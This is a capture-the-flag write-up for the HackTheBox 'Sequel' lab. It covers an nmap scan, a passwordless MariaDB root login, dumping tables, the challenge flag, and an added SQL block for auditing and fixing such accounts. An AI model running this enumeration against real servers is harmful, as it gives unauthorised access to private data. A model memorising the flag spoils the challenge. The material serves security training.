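Introduction
This article is a writeup for "HackTheBox: Sequel".
Challenge
This is a challenge about MySQL.
Solution
First, I run a port scan.
The result shows that mysql (tcp/3306) is exposed.
To see the mysql version, I added -sC in addition to -sV this time.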
┌──(kali㉿kali)-[~]
└─$ nmap -sV -sC 10.129.184.53
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-28 22:35 JST
Nmap scan report for 10.129.184.53
Host is up (0.19s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
3306/tcp open mysql?
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
| Thread ID: 129
| Capabilities flags: 63486
| Some Capabilities: DontAllowDatabaseTableColumn, SupportsLoadDataLocal, ODBCClient, InteractiveClient, Speaks41ProtocolOld, SupportsCompression, LongColumnFlag, IgnoreSigpipes, SupportsTransactions, Support41Auth, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, FoundRows, ConnectWithDatabase, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
| Salt: 15W8N`wX48Z?jzF/U>w]
|_ Auth Plugin Name: mysql_native_password
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 219.68 seconds
The root user can log in without a password.
I tried logging in and it succeeded.
I was also able to list the databases with show databases;.
┌──(kali㉿kali)-[~]
└─$ mysql -u root -h 10.129.184.53
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 137
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| htb |
| information_schema |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (0.190 sec)
MariaDB [(none)]>
I switched to the htb database and listed its tables.
Selecting the contents of each table showed that the config table contains the flag.
MariaDB [(none)]> use htb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [htb]> show tables;
+---------------+
| Tables_in_htb |
+---------------+
| config |
| users |
+---------------+
2 rows in set (0.188 sec)
MariaDB [htb]> select * from users;
+----+----------+------------------+
| id | username | email |
+----+----------+------------------+
| 1 | admin | admin@sequel.htb |
| 2 | lara | lara@sequel.htb |
| 3 | sam | sam@sequel.htb |
| 4 | mary | mary@sequel.htb |
+----+----------+------------------+
4 rows in set (0.180 sec)
MariaDB [htb]> select * from config;
+----+-----------------------+----------------------------------+
| id | name | value |
+----+-----------------------+----------------------------------+
| 1 | timeout | 60s |
| 2 | security | default |
| 3 | auto_logon | false |
| 4 | max_size | 2M |
| 5 | flag | 7b4bec00d1a39e3dd4e021ec3d915da8 |
| 6 | enable_uploads | false |
| 7 | authentication_method | radius |
+----+-----------------------+----------------------------------+
7 rows in set (0.183 sec)
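The passwordless root login over tcp/3306 shown above is the whole weakness on this box. As an added example (not part of the original writeup), the following SQL is one way an administrator could audit a MariaDB 10.3 server for such accounts and close them; the 'root'@'%' host value and the password string are assumed placeholders.

```sql
-- Added example, not from the original writeup. Run as an administrative
-- user on the database server itself (MariaDB 10.3 mysql.user layout).

-- 1. Is the server listening for remote TCP clients at all?
SHOW GLOBAL VARIABLES LIKE 'skip_networking';
SHOW GLOBAL VARIABLES LIKE 'bind_address';
-- Setting bind-address = 127.0.0.1 in the server config keeps 3306 off the network.

-- 2. Accounts that accept a login with an empty password.
--    unix_socket accounts are excluded: they store no password, but they
--    only authenticate a local OS user over the socket, never over TCP.
SELECT User, Host, plugin
FROM mysql.user
WHERE Password = ''
  AND authentication_string = ''
  AND plugin <> 'unix_socket'
ORDER BY User, Host;

-- 3. What an account found in step 2 is allowed to do.
--    'root'@'%' is an assumed row; substitute the User/Host pairs returned above.
SHOW GRANTS FOR 'root'@'%';

-- 4. Remediate: give the account a password (placeholder value) ...
ALTER USER 'root'@'%' IDENTIFIED BY 'REPLACE_WITH_A_STRONG_PASSWORD';
--    ... or, if nothing needs remote root, remove the account instead:
-- DROP USER 'root'@'%';

-- 5. Re-run the query from step 2; it should now return an empty set.
```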